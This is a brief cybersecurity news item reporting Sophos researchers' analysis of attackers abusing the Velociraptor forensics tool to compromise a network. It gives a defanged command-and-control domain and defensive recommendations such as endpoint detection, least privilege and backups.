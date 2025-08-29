Open-source digital forensics and incident response tool Velociraptor has been exploited to remotely compromise a targeted network, GBHackers News reports. Threat actors leveraged the Windows msiexec utility to download another installer from a Cloudflare Workers domain, leading to Velociraptor deployment, according to an analysis from Sophos' Counter Threat Unit. After configuring Velociraptor to communicate with the 'velo[.]qaubctgg[.]workers[.]dev' command-and-control domain, attackers proceeded to download Visual Studio Code through a PowerShell command while installing another executable for persistence before invoking msiexec for further malware downloads. With illicit Velociraptor usage indicative of subsequent ransomware compromise, organizations should not only be wary of suspicious tunneling activity and service installations but also adopt endpoint detection and response systems to better examine potentially malicious actions, said Sophos CTU researchers. Organizations have also been urged to implement least-privilege principles and ensure potent backup systems to better counter intrusions.
